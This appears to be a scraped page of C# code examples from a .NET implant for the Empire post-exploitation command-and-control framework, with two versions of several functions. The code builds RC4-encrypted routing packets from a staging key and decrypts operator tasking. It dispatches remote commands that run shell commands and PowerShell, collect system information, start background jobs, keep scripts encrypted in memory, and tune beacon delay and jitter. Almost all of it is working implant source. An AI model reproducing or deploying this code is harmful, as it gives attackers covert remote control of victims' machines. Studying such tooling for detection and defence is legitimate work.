Ejemplo n.º 1
0
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] newRoutingPacket(byte[] encryptedBytes, Int32 meta)
        {
            Int32 encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionId);
            data = Misc.combine(data, new byte[4] {
                0x01, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = newInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, stagingKeyBytes);
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
Ejemplo n.º 2
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
        {
            int encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID());
            byte   lang = 0x03;

            data = Misc.combine(data, new byte[4] {
                lang, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = NewInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes());
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
Ejemplo n.º 3
0
        ////////////////////////////////////////////////////////////////////////////////
        public Byte[] task121(Coms.PACKET packet)
        {
            Byte[] scriptBytes = EmpireStager.aesDecrypt(sessionKey, jobTracking.importedScript);
            String script      = Encoding.UTF8.GetString(scriptBytes);
            String jobId       = jobTracking.startAgentJob(script + ";" + packet.data);

            return(encodePacket(packet.type, "Job started: " + jobId, packet.taskId));
        }
Ejemplo n.º 4
0
        ////////////////////////////////////////////////////////////////////////////////
        // Run an Agent Job
        ////////////////////////////////////////////////////////////////////////////////
        public byte[] Task121(PACKET packet)
        {
            byte[] scriptBytes = EmpireStager.aesDecrypt(sessionInfo.GetSessionKey(), jobTracking.ImportedScript);
            string script      = Encoding.UTF8.GetString(scriptBytes);
            string jobId       = jobTracking.StartAgentJob(script + ";" + packet.data, packet.taskId);

            return(EncodePacket(packet.type, "Job started: " + jobId, packet.taskId));
        }
Ejemplo n.º 5
0
        ////////////////////////////////////////////////////////////////////////////////
        public Byte[] task120(Coms.PACKET packet)
        {
            Random random = new Random();

            Byte[] initializationVector = new Byte[16];
            random.NextBytes(initializationVector);
            jobTracking.importedScript = EmpireStager.aesEncrypt(sessionKeyBytes, initializationVector, Encoding.ASCII.GetBytes(packet.data));
            return(encodePacket(packet.type, "Script successfully saved in memory", packet.taskId));
        }
Ejemplo n.º 6
0
        ////////////////////////////////////////////////////////////////////////////////
        private void processTaskingPackets(byte[] encryptedTask)
        {
            byte[] taskingBytes = EmpireStager.aesDecrypt(sessionKey, encryptedTask);
            PACKET firstPacket  = decodePacket(taskingBytes, 0);

            byte[] resultPackets = processTasking(firstPacket);
            sendMessage(resultPackets);

            Int32  offset    = 12 + (Int32)firstPacket.length;
            String remaining = firstPacket.remaining;
        }
Ejemplo n.º 7
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private void ProcessTaskingPackets(byte[] encryptedTask)
        {
            byte[] taskingBytes = EmpireStager.aesDecrypt(sessionInfo.GetSessionKey(), encryptedTask);
            PACKET firstPacket  = DecodePacket(taskingBytes, 0);

            byte[] resultPackets = ProcessTasking(firstPacket);
            SendMessage(resultPackets);

            int    offset    = 12 + (int)firstPacket.length;
            string remaining = firstPacket.remaining;
        }
Ejemplo n.º 8
0
        ////////////////////////////////////////////////////////////////////////////////
        internal void decodeRoutingPacket(byte[] packetData, ref JobTracking jobTracking)
        {
            this.jobTracking = jobTracking;

            if (packetData.Length < 20)
            {
                return;
            }
            Int32 offset = 0;

            while (offset < packetData.Length)
            {
                byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
                byte[] routingInitializationVector = routingPacket.Take(4).ToArray();
                byte[] routingEncryptedData        = packetData.Skip(4).Take(16).ToArray();
                offset += 20;

                byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKeyBytes);

                byte[] routingData     = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
                String packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());
                try
                {
                    byte language = routingPacket[8];
                    byte metaData = routingPacket[9];
                }
                catch (IndexOutOfRangeException error)
                {
                }
                byte[] extra        = routingPacket.Skip(10).Take(2).ToArray();
                UInt32 packetLength = BitConverter.ToUInt32(routingData, 12);

                if (packetLength < 0)
                {
                    break;
                }

                if (sessionId == packetSessionId)
                {
                    byte[] encryptedData = packetData.Skip(offset).Take(offset + (Int32)packetLength - 1).ToArray();
                    offset += (Int32)packetLength;
                    try
                    {
                        processTaskingPackets(encryptedData);
                    }
                    catch (Exception error)
                    {
                    }
                }
            }
        }
Ejemplo n.º 9
0
        ////////////////////////////////////////////////////////////////////////////////
        //The hard part
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] processTasking(PACKET packet)
        {
            byte[] returnPacket = new byte[0];
            try
            {
                //Change this to a switch : case
                Int32 type = packet.type;
                switch (type)
                {
                case 1:
                    byte[] systemInformationBytes = EmpireStager.GetSystemInformation("0", "servername");
                    String systemInformation      = Encoding.ASCII.GetString(systemInformationBytes);
                    return(encodePacket(1, systemInformation, packet.taskId));

                case 2:
                    String message = "[!] Agent " + sessionId + " exiting";
                    sendMessage(encodePacket(2, message, packet.taskId));
                    Environment.Exit(0);
                    //This is still dumb
                    return(new byte[0]);

                case 40:
                    String[] parts = packet.data.Split(' ');
                    String   output;
                    if (parts.Length == 1)
                    {
                        output = Agent.invokeShellCommand(parts[0], "");
                    }
                    else
                    {
                        output = Agent.invokeShellCommand(parts[0], parts[1]);
                    }
                    byte[] packetBytes = encodePacket(packet.type, output, packet.taskId);
                    return(packetBytes);

                case 41:
                    return(task41(packet));

                case 42:
                    return(task42(packet));

                case 50:
                    List <String> runningJobs = new List <String>(jobTracking.jobs.Keys);
                    return(encodePacket(packet.type, runningJobs.ToArray(), packet.taskId));

                case 51:
                    return(task51(packet));

                case 100:
                    return(encodePacket(packet.type, Agent.runPowerShell(packet.data), packet.taskId));

                case 101:
                    return(task101(packet));

                case 110:
                    String jobId = jobTracking.startAgentJob(packet.data);
                    return(encodePacket(packet.type, "Job started: " + jobId, packet.taskId));

                case 111:
                    return(encodePacket(packet.type, "Not Implimented", packet.taskId));

                case 120:
                    return(task120(packet));

                case 121:
                    return(task121(packet));

                default:
                    return(encodePacket(0, "Invalid type: " + packet.type, packet.taskId));
                }
            }
            catch (Exception error)
            {
                return(encodePacket(packet.type, "Error running command: " + error, packet.taskId));
            }
        }
Ejemplo n.º 10
0
        ////////////////////////////////////////////////////////////////////////////////
        //The hard part
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] ProcessTasking(PACKET packet)
        {
            byte[] returnPacket = new byte[0];
            try
            {
                //Change this to a switch : case
                int type = packet.type;
                switch (type)
                {
                case 1:
                    byte[] systemInformationBytes = EmpireStager.GetSystemInformation("0", "servername");
                    string systemInformation      = Encoding.ASCII.GetString(systemInformationBytes);
                    return(EncodePacket(1, systemInformation, packet.taskId));

                case 2:
                    string message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting";
                    SendMessage(EncodePacket(2, message, packet.taskId));
                    Environment.Exit(0);
                    //This is still dumb
                    return(new byte[0]);

                case 40:
                    string[] parts = packet.data.Split(' ');
                    string   output;
                    if (parts[0] == "Set-Delay")
                    {
                        Console.WriteLine("Current delay" + sessionInfo.GetDefaultDelay());
                        sessionInfo.SetDefaultDelay(UInt32.Parse(parts[1]));
                        sessionInfo.SetDefaultJitter(UInt32.Parse(parts[2]));
                        output = "Delay set to " + parts[1] + "Jitter set to " + parts[2];
                    }
                    else if (1 == parts.Length)
                    {
                        output = Agent.InvokeShellCommand(parts.FirstOrDefault(), "");
                    }
                    else
                    {
                        output = Agent.InvokeShellCommand(parts.FirstOrDefault(), string.Join(" ", parts.Skip(1).Take(parts.Length - 1).ToArray()));
                    }
                    byte[] packetBytes = EncodePacket(packet.type, output, packet.taskId);
                    return(packetBytes);

                case 41:
                    return(Task41(packet));

                case 42:
                    return(Task42(packet));

                case 43:
                    return(Task43(packet));

                case 44:
                    return(Task44(packet));

                case 50:
                    List <string> runningJobs = new List <string>(jobTracking.jobs.Keys);
                    return(EncodePacket(packet.type, runningJobs.ToArray(), packet.taskId));

                case 51:
                    return(Task51(packet));

                case 100:
                    return(EncodePacket(packet.type, Agent.RunPowerShell(packet.data), packet.taskId));

                case 101:
                    return(Task101(packet));

                case 110:
                    string jobId = jobTracking.StartAgentJob(packet.data, packet.taskId);
                    return(EncodePacket(packet.type, "Job started: " + jobId, packet.taskId));

                case 111:
                    return(EncodePacket(packet.type, "Not Implimented", packet.taskId));

                case 120:
                    return(Task120(packet));

                case 121:
                    return(Task121(packet));

                default:
                    return(EncodePacket(0, "Invalid type: " + packet.type, packet.taskId));
                }
            }
            catch (Exception error)
            {
                return(EncodePacket(packet.type, "Error running command: " + error, packet.taskId));
            }
        }